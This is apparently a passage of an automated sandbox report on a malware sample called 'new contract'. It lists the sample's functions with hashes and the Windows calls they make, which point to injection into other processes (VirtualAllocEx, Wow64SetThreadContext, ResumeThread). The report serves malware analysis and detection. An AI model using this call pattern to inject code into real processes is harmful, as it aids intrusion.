                                                                                                                                                                            • Instruction ID: 4b640b24d0519bf81a77b53e1663c4aef6628cc3a60d88fd7f482593effb00a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 706aaab9f8621e5d74309542eef7eca45196ef413c19f3a06e52f19109b73cf4
                                                                                                                                                                            • Instruction Fuzzy Hash: 4B2148B68003499FCB10DFAAC885AEEFFF5FF48320F50842AE559A7251C7349944CBA5
                                                                                                                                                                            Function 014BD27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014BD656,?,?,?,?,?), ref: 014BD717
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                            • Opcode ID: 319dd8dbacdcb6c81edbb0df34a65e40ecabb12730f69a7bf790e9bd90d6b74f
                                                                                                                                                                            • Instruction ID: 9206e55bdeff7306b2539df8af26d291ce6e2439bd7bd8c82572fb54128dde74
                                                                                                                                                                            • Opcode Fuzzy Hash: 319dd8dbacdcb6c81edbb0df34a65e40ecabb12730f69a7bf790e9bd90d6b74f
                                                                                                                                                                            • Instruction Fuzzy Hash: 0321E6B5D003489FDB10CF9AD884ADEBFF4EB48314F14845AE918A3350D374A954DFA5
                                                                                                                                                                            Function 07984378 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079843F6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                                            • Opcode ID: eab35a86e7e38f40b671804bdfe8539e8a22b79d134bb200f14e89187d19916e
                                                                                                                                                                            • Instruction ID: 3c305b4bd2e5de16197d45791f896158c07417667bbda24c3dab737928e4cb88
                                                                                                                                                                            • Opcode Fuzzy Hash: eab35a86e7e38f40b671804bdfe8539e8a22b79d134bb200f14e89187d19916e
                                                                                                                                                                            • Instruction Fuzzy Hash: D82179B1D003098FDB14DFAAC8857EEBBF4EF48324F14842AD459A7240CB789944CFA0
                                                                                                                                                                            Function 07984A00 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07984A80
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                                            • Opcode ID: 81f4aad11ba3f5c0e76c984b23d0144c7cbede14bcb5b75655b4a2d41453219a
                                                                                                                                                                            • Instruction ID: 7f0e05f9c5b567ae426d08f8e865922a919cb48bdd5d7785347378e597092ef2
                                                                                                                                                                            • Opcode Fuzzy Hash: 81f4aad11ba3f5c0e76c984b23d0144c7cbede14bcb5b75655b4a2d41453219a
                                                                                                                                                                            • Instruction Fuzzy Hash: A52128B18003499FCB10DFAAC845AEEFBF5FF48314F50842AE559A7250C7349944DBA5
                                                                                                                                                                            Function 014BD689 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014BD656,?,?,?,?,?), ref: 014BD717
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                            • Opcode ID: e70f4c0f6323f39191acee7ed3857eaf9ac1bafb44de2af2d8e422bfcdacddbd
                                                                                                                                                                            • Instruction ID: b51fa077405125461697824e78a13058c9ca6be310de6e2420d137f23de40d52
                                                                                                                                                                            • Opcode Fuzzy Hash: e70f4c0f6323f39191acee7ed3857eaf9ac1bafb44de2af2d8e422bfcdacddbd
                                                                                                                                                                            • Instruction Fuzzy Hash: 1221E2B5D002489FDB10CFA9D985AEEBBF5FB48324F14841AE918B3351C378A954CF60
                                                                                                                                                                            Function 07984448 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079844BE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: bb117e8abb4ea0d3b86b2cb5949d119dada8d8b737452d5c2fe03ff4caa3f213
                                                                                                                                                                            • Instruction ID: 1758bfbacd71c032857475773b409ed3b71781a94385d2ab412f4dcf80fd4e5a
                                                                                                                                                                            • Opcode Fuzzy Hash: bb117e8abb4ea0d3b86b2cb5949d119dada8d8b737452d5c2fe03ff4caa3f213
                                                                                                                                                                            • Instruction Fuzzy Hash: 1E1159B68003499FCB14DFAAD845ADEFFF5EF48324F24881AE519A7250C775A944CFA0
                                                                                                                                                                            Function 077B07F8 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,077B3402,?,?,?,?,?), ref: 077B34A7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744265645.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1744229333.00000000077A0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_77a0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668623891-0
                                                                                                                                                                            • Opcode ID: 6f20ded290180a36e73dd2d26d6ad78df492cb94c97c37c393f3ed9e95665304
                                                                                                                                                                            • Instruction ID: de8a5bd9507280d0383eb2f7dd748b453e0b275ceaeb838c3441d9f331afb15e
                                                                                                                                                                            • Opcode Fuzzy Hash: 6f20ded290180a36e73dd2d26d6ad78df492cb94c97c37c393f3ed9e95665304
                                                                                                                                                                            • Instruction Fuzzy Hash: FB116AB580034D9FDB10DF9AC844BEEBFF8EB48320F14841AE914A3250C335A994DFA4
                                                                                                                                                                            Function 079842C1 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                                            • Opcode ID: 83c35bbbae0fee2cbaa222945840c4b030732261fdd72f77111d7f314c7d45bc
                                                                                                                                                                            • Instruction ID: fc96c7c52230030451e93a9a51c97950294cc20899314f8696e4c620e5718780
                                                                                                                                                                            • Opcode Fuzzy Hash: 83c35bbbae0fee2cbaa222945840c4b030732261fdd72f77111d7f314c7d45bc
                                                                                                                                                                            • Instruction Fuzzy Hash: B31146B59003498BCB10DFAAD8457EEFFF5AF88324F24841AD559A7250CB35A944CBA4
                                                                                                                                                                            Function 07984450 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079844BE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: d53a81a252908c2b44d6e452b0bcc8c5eafbfb2b9fb7e221ff65666fa44b8d82
                                                                                                                                                                            • Instruction ID: 8722527217dc846544e8911e2d47c862c1841f48b0d92c70fd2e787a8fbde2d1
                                                                                                                                                                            • Opcode Fuzzy Hash: d53a81a252908c2b44d6e452b0bcc8c5eafbfb2b9fb7e221ff65666fa44b8d82
                                                                                                                                                                            • Instruction Fuzzy Hash: 2F1137B59003499FCB10DFAAC845ADFBFF5EF88324F148819E519A7250C775A954CFA0
                                                                                                                                                                            Function 079842C8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                                            • Opcode ID: f9bd088055926112e11e41ff0e2ada0e27860de28e1f0a7c23064bb9c8e02fd5
                                                                                                                                                                            • Instruction ID: 8cf12a9b15faced57b42031c75d8c037f714d0517dcc561920a1a237f1793a5b
                                                                                                                                                                            • Opcode Fuzzy Hash: f9bd088055926112e11e41ff0e2ada0e27860de28e1f0a7c23064bb9c8e02fd5
                                                                                                                                                                            • Instruction Fuzzy Hash: 561136B19003498FDB10DFAAC8457EEFBF9EF88324F24841AD519A7250CB75A944CFA4
                                                                                                                                                                            Function 0798453C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07986F5D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                            • Opcode ID: 3e3fa33b5a22da090b662fa2b768cb5f1cfabbfa90a31ff0c78b9eca2ff5f325
                                                                                                                                                                            • Instruction ID: b249e40269d2f56fe149664e467ecbf04249e850d38587d044f2a33abaa3a58a
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e3fa33b5a22da090b662fa2b768cb5f1cfabbfa90a31ff0c78b9eca2ff5f325
                                                                                                                                                                            • Instruction Fuzzy Hash: B61136B58003489FCB10DF99C849BDEBBF8EB48314F10841AE519A7201C374A944CFA5
                                                                                                                                                                            Function 014BAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 014BAFFE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                            • Opcode ID: 5db8c0890ee12e3d9969a3161e58fb021d1778561e9dd39ed84d9dfff49a7ea7
                                                                                                                                                                            • Instruction ID: 89fa229f77c923fb13c1a46675e214b1215aec86c494413a01e8b96cfbff4c1e
                                                                                                                                                                            • Opcode Fuzzy Hash: 5db8c0890ee12e3d9969a3161e58fb021d1778561e9dd39ed84d9dfff49a7ea7
                                                                                                                                                                            • Instruction Fuzzy Hash: 6F11E0B5C007498FDB14DF9AC844ADEFBF4EB88324F10841AD929A7760D375A545CFA1
                                                                                                                                                                            Function 0123D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739909013.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_123d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 85dbdcb4ac24dd0799d147b0a82944ad5b4da1bc81eefd401891438bb0a075a7
                                                                                                                                                                            • Instruction ID: 2f81a259eac3038eae176fff84e0f15354eac92b11fb7b4ff65dcad6e4d9631d
                                                                                                                                                                            • Opcode Fuzzy Hash: 85dbdcb4ac24dd0799d147b0a82944ad5b4da1bc81eefd401891438bb0a075a7
                                                                                                                                                                            • Instruction Fuzzy Hash: 992148B1610209DFCB01DF58E8C0B26BF65FBC4318F60C569E9090B286C336D416C7A1
                                                                                                                                                                            Function 0123D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739909013.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_123d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1d6a6574a9549a0b3e3afb6b38b7ba2ae3fb4d731466ae2171eb5856e4346246
                                                                                                                                                                            • Instruction ID: b8ab55746d4dd2f4a338e4e916fbbe3f0e6e8ca00372979e3701caf7a04f04a7
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d6a6574a9549a0b3e3afb6b38b7ba2ae3fb4d731466ae2171eb5856e4346246
                                                                                                                                                                            • Instruction Fuzzy Hash: 822136B5614209DFDB01DF58D9C0B56BF65FBD4324F60C568DA0A0B246C336E416CBA1
                                                                                                                                                                            Function 0124D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739948322.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_124d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 001e6e09cd83bd4d060853e1382f06299aee009bd2a9dbb0f99c1f76899280c9
                                                                                                                                                                            • Instruction ID: 25860d7c7ea4754681a38f3de11d6ebe7064790b0452c4202f70c10b0d9afc4e
                                                                                                                                                                            • Opcode Fuzzy Hash: 001e6e09cd83bd4d060853e1382f06299aee009bd2a9dbb0f99c1f76899280c9
                                                                                                                                                                            • Instruction Fuzzy Hash: BE213771614209EFDB09DF98C9C4B25BBA5FB94324F20C66DE90A4B343C376D806CB61
                                                                                                                                                                            Function 0124D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739948322.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_124d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e2d63cfd2f2b9917c9650fec84a6aa4a016629739062760a6e825e87ddf3c448
                                                                                                                                                                            • Instruction ID: 05af787c2ab8fd47948c43d39025d811c8585a0ae22ab02e143a2926c88391b0
                                                                                                                                                                            • Opcode Fuzzy Hash: e2d63cfd2f2b9917c9650fec84a6aa4a016629739062760a6e825e87ddf3c448
                                                                                                                                                                            • Instruction Fuzzy Hash: 64212575614208DFCB19DF58D8C4B16BBA5FBA4314F20C96DD90A0B342C37AD407CA61
                                                                                                                                                                            Function 0124D006 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739948322.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_124d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 29e9b0971248212cd418e4598a04f537456ff03b0e411d730e12232672f44b14
                                                                                                                                                                            • Instruction ID: da02ad86e5ca8702c99483095b7df661be69bb891367459996344cbdcb935043
                                                                                                                                                                            • Opcode Fuzzy Hash: 29e9b0971248212cd418e4598a04f537456ff03b0e411d730e12232672f44b14
                                                                                                                                                                            • Instruction Fuzzy Hash: D8219F755083849FCB07CF64D994B11BF71EB56314F28C5EAD9498F2A7C33A980ACB62
                                                                                                                                                                            Function 0123D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739909013.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_123d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                            • Instruction ID: eb7a0a46eeda1f4e1a1662dca796147fede52554656a36a03729d001b716dd9e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A1103B6504284CFCB12CF54D5C4B16BF72FB84324F24C6A9D9090B297C336D45ACBA1
                                                                                                                                                                            Function 0123D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739909013.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_123d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                            • Instruction ID: 49325dcffbb52a754b81144e75f9441fcc2d7bdf765574b49e34c6ca5705f521
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                                                                            • Instruction Fuzzy Hash: 7E1103B6504285CFDB02CF54D5C4B56BF72FB84324F24C2A9DA090B257C33AE45ACBA1
                                                                                                                                                                            Function 0124D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1739948322.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_124d000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                                            • Instruction ID: 019b44d71fd9e2b0d14c3aba7c5c2239eeaeaabc99143f917a5bcaa58f9b5d80
                                                                                                                                                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                                            • Instruction Fuzzy Hash: 5211BB75944285DFDB06CF54C5C4B15BBB2FB84224F24C6ADD9494B297C33AD40ACB61

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 077A4D3B Relevance: 1.0, Instructions: 975COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744229333.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, Offset: 077A0000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1744265645.00000000077B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_77a0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2e3d80e92c94b04800db846ddc33c5071c363f571cc418160d6b7630bf53a888
                                                                                                                                                                            • Instruction ID: 170734038df4e40b6ab11b2e078a885c222e05f4a42294c6f7c28aa1322af0da
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e3d80e92c94b04800db846ddc33c5071c363f571cc418160d6b7630bf53a888
                                                                                                                                                                            • Instruction Fuzzy Hash: 68A2C37148E3C19FC7578B7088B55817FB0AE1322475E86EFD4C18E4A3E3AD585ACB62
                                                                                                                                                                            Function 079819E1 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7c36995146cf2c0492e6208bcc115fef1f354bf3681ece6f0894fbb59d50ad5d
                                                                                                                                                                            • Instruction ID: 4bc3dd8030917d353c57109138ff3ac93deee450200cb1cf8fe1197dd244438f
                                                                                                                                                                            • Opcode Fuzzy Hash: 7c36995146cf2c0492e6208bcc115fef1f354bf3681ece6f0894fbb59d50ad5d
                                                                                                                                                                            • Instruction Fuzzy Hash: 1DE1E9B4E006198FDB14EFA9C5909AEFBB2BF89305F248169D414AB355D731A942CF60
                                                                                                                                                                            Function 07981E28 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0d3017a5449c9e84db9724edabbf0764f413aa15b6eadef080491648b0dafc54
                                                                                                                                                                            • Instruction ID: 93de8e6c8f833698410ad2d2278f5ffa0480b3f5f6126300a761c19b19270a0c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d3017a5449c9e84db9724edabbf0764f413aa15b6eadef080491648b0dafc54
                                                                                                                                                                            • Instruction Fuzzy Hash: 47E1DAB4E002198FDB54DFA9C5909AEFBB2FF89304F24C169D914AB355D731A941CFA0
                                                                                                                                                                            Function 07983668 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6afdf32ac76fd87257c21a46f9af7bb5397a39ffc757769cc8fc506a3e33555c
                                                                                                                                                                            • Instruction ID: ebe137bd586c7afdda8e437dc690a350c4536e481f631cec375aadaa163e6668
                                                                                                                                                                            • Opcode Fuzzy Hash: 6afdf32ac76fd87257c21a46f9af7bb5397a39ffc757769cc8fc506a3e33555c
                                                                                                                                                                            • Instruction Fuzzy Hash: 2EE1E8B4E006198FDB14EFA9C5909AEFBB2FF89304F24C169D815AB355D731A941CFA0
                                                                                                                                                                            Function 07983AA0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1de8fffccdd4478ec1c720796ac9b4a7bf67eb95fe52377d85b468595faa5de5
                                                                                                                                                                            • Instruction ID: 00b23ec8527efda0a7a52df048100bc4b460e098c33b35e446a13496125c7f7c
                                                                                                                                                                            • Opcode Fuzzy Hash: 1de8fffccdd4478ec1c720796ac9b4a7bf67eb95fe52377d85b468595faa5de5
                                                                                                                                                                            • Instruction Fuzzy Hash: 2EE1F9B4E006198FDB14EFA9C5909AEFBB2FF89304F24C169D815AB356D731A941CF60
                                                                                                                                                                            Function 07982260 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
